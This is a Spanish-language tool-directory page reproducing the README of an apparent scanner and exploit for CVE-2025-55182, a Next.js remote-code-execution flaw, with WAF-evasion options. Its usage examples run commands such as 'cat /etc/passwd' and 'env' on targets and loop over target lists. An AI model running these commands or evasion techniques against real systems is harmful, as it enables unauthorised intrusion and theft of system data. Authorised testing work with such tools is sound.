Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell-CVE-2025-55182-Advanced-Scanner — Escáner automatizado para CVE-2025-55182 RCE en Next.js con 8 técnicas de evasión de WAF, ejecución de comandos personalizada y modo de detección solo para pruebas en pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/ysfcndgr/react2shell-cve-2025-55182-advanced-scanner
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónComando y Control
GitHubysfcndgr/react2shell-cve-2025-55182-advanced-scanner

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell-CVE-2025-55182-Advanced-Scanner

Escáner automatizado para CVE-2025-55182 RCE en Next.js con 8 técnicas de evasión de WAF, ejecución de comandos personalizada y modo de detección solo para pruebas en pruebas de penetración autorizadas.

Ver Repositorio
hace 8 mesesAún no revisado

CVE-2025-55182 Escáner Avanzado

Python License Security

Herramienta avanzada de pruebas de penetración para detectar y explotar la vulnerabilidad CVE-2025-55182 en aplicaciones Next.js

📋 Tabla de Contenidos

  • Visión General
  • Características
  • Instalación
  • Uso
  • Ejemplos
  • Técnicas de Bypass
  • Detalles Técnicos
  • Aviso Legal
  • Contribuciones
  • Licencia

🔍 Visión General CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a aplicaciones Next.js a través de React Server Components. Este escáner proporciona una forma automatizada de detectar y explotar esta vulnerabilidad con diversas técnicas de bypass de WAF.

Puntuación CVSS: 9.8 (Crítica)

✨ Características

  • Múltiples Variantes de Payload: Diferentes patrones de explotación
  • Técnicas de Bypass de WAF: 8 métodos de bypass diferentes
  • Ejecución Personalizada de Comandos: Ejecuta comandos arbitrarios del sistema
  • Pruebas de Vulnerabilidad: Modo solo prueba para detección segura
  • Soporte de Proxy: Enruta el tráfico a través de un proxy para depuración
  • Bypass SSL: Opción para omitir la verificación del certificado SSL
  • Mecanismo de Reintento: Reintento automático en caso de fallo
  • Salida Colorida: Interfaz de consola fácil de leer

🚀 Instalación Requisitos previos

  • Python 3.6 o superior
  • Gestor de paquetes pip
root@kitploit:~
# Instalar dependencias
pip install -r requirements.txt

# Hacer el script ejecutable (Linux/Mac)
chmod +x scanner.py

Instalación con Docker

root@kitploit:~
# Construir imagen Docker
docker build -t cve-2025-55182-scanner .

# Ejecutar con Docker
docker run --rm cve-2025-55182-scanner -h

📖 Uso Uso básico

root@kitploit:~
# Mostrar ayuda
python scanner.py -h

# Probar un objetivo
python scanner.py -d http://target.com --test-only

# Ejecutar comando
python scanner.py -d http://target.com -c "whoami"

Opciones de línea de comandos

📚 Ejemplos Explotación Básica

root@kitploit:~
# Probar si el objetivo es vulnerable
python scanner.py -d http://vulnapp.com --test-only

# Ejecutar comando simple
python scanner.py -d http://vulnapp.com -c "id"

# Listar contenido del directorio
python scanner.py -d https://target.com -c "ls -la" -k

# Leer archivo del sistema
python scanner.py -d http://localhost:3000 -c "cat /etc/passwd"

Ejemplos de Bypass de WAF

root@kitploit:~
# Usar bypass de codificación Base64
python scanner.py -d http://target.com -c "uname -a" -t 2

# Usar codificación Unicode
python scanner.py -d https://target.com -c "whoami" -t 3 -k

# Usar técnicas mixtas con proxy
python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080

# Probar todas las técnicas automáticamente
for i in {1..8}; do
    echo "Probando técnica $i"
    python scanner.py -d http://target.com -c "hostname" -t $i
    echo ""
done

Uso Avanzado

root@kitploit:~
# Probar múltiples objetivos desde un archivo
for target in $(cat targets.txt); do
    echo "Probando $target"
    python scanner.py -d $target --test-only
done

# Guardar salida en un archivo
python scanner.py -d http://target.com -c "ifconfig" > output.txt

# Usar con proxy de Burp Suite
python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k

🛡️ Técnicas de Bypass El escáner incluye 8 técnicas diferentes de bypass de WAF:

  1. Payload por defecto: Patrón de explotación original
  2. Codificación Base64: Codificar comandos en Base64
  3. Codificación Unicode: Usar codificación de caracteres Unicode
  4. Manipulación de Mayúsculas/Minúsculas: Variaciones aleatorias de mayúsculas y minúsculas
  5. Doble Codificación: Codificación URL doble
  6. Bytes Nulos: Inyección de bytes nulos
  7. Cabeceras Mixtas: Cabeceras HTTP variadas
  8. Retardos Aleatorios: Añadir intervalos de espera aleatorios

Cada técnica se puede seleccionar con la bandera -t.

🔧 Detalles Técnicos Antecedentes de la Vulnerabilidad CVE-2025-55182 es una vulnerabilidad de contaminación de prototipos en Next.js que conduce a la ejecución remota de código a través de React Server Components. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en el servidor.

Estructura del Payload La herramienta utiliza una solicitud multipart/form-data especialmente diseñada con contaminación de prototipos para lograr RCE:

  • Contaminación de Prototipos: Contamina la cadena de prototipos de Promise
  • Inyección de Comandos: Inyecta la ejecución de child_process de Node.js
  • Extracción de Resultados: Extrae resultados a través de cabeceras de redirección

Método de Detección El escáner envía solicitudes especialmente diseñadas y busca:

  • Cabeceras X-Action-Redirect que contengan la salida del comando
  • Patrones de respuesta específicos que indiquen una explotación exitosa
  • Mensajes de error que sugieran la presencia de la vulnerabilidad

⚠️ Aviso Legal IMPORTANTE: SOLO USO LEGAL Y ÉTICO

Esta herramienta se proporciona para:

  • Investigación y educación en seguridad
  • Pruebas de penetración autorizadas
  • Evaluación de vulnerabilidades con permiso adecuado
  • Fines de seguridad defensiva

NO USE ESTA HERRAMIENTA PARA:

  • Pruebas no autorizadas de sistemas
  • Actividades ilegales
  • Fines maliciosos
  • Violar términos de servicio

Al usar esta herramienta, usted acepta:

  • Usarla solo en sistemas que posea o tenga permiso explícito para probar
  • Cumplir con todas las leyes y regulaciones aplicables
  • Asumir toda la responsabilidad por sus acciones
  • No responsabilizar al autor por cualquier uso indebido

🤝 Contribuciones ¡Las contribuciones son bienvenidas! Así es como puede ayudar:

Reportar Problemas

  • Verifique si el problema ya existe
  • Proporcione pasos detallados de reproducción
  • Incluya mensajes de error y registros
  • Especifique los detalles de su entorno

Contribuciones de Código

  • Haga un fork del repositorio
  • Cree una rama de características
  • Escriba mensajes de commit claros
  • Agregue pruebas si corresponde
  • Envíe una solicitud de extracción (pull request)

Solicitudes de Funcionalidades Sugiera nuevas funcionalidades a través de issues de GitHub con la etiqueta "enhancement".

📄 Licencia Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

Licencia MIT

Derechos de autor (c) 2025

Por la presente se concede permiso, libre de cargos, a cualquier persona que obtenga una copia de este software y los archivos de documentación asociados (el "Software"), para utilizar el Software sin restricción, incluyendo sin limitación los derechos de usar, copiar, modificar, fusionar, publicar, distribuir, sublicenciar y/o vender copias del Software, y para permitir a las personas a quienes se les proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:

El aviso de derechos de autor anterior y este aviso de permiso se incluirán en todas las copias o partes sustanciales del Software.

EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUYENDO PERO NO LIMITADO A GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN PROPÓSITO PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DE DERECHOS DE AUTOR SERÁN RESPONSABLES DE NINGUNA RECLAMACIÓN, DAÑO U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O CUALQUIER OTRO MOTIVO, QUE SURJA DE O EN CONEXIÓN CON EL SOFTWARE O EL USO U OTRO TIPO DE ACCIONES EN EL SOFTWARE.

🔗 Referencias

  • Entrada Oficial de CVE-2025-55182
  • Plantilla de Nuclei de ProjectDiscovery
  • Avisos de Seguridad de Next.js
  • Documentación de React Server Components

⭐ Historial de Estrellas Si encuentra útil esta herramienta, ¡considere darle una estrella en GitHub!

Recuerda: Un gran poder conlleva una gran responsabilidad. Usa esta herramienta de forma ética y legal.

Descargar herramienta
OpciónDescripciónPor defecto
-d, --domainURL objetivohttp://localhost:3000
-c, --commandComando a ejecutarid
-t, --techniqueTécnica de bypass (1-8)1
-p, --proxyServidor proxyNinguno
-k, --insecureOmitir verificación SSLFalse
--test-onlySolo probar vulnerabilidadFalse
-h, --helpMostrar mensaje de ayudaN/A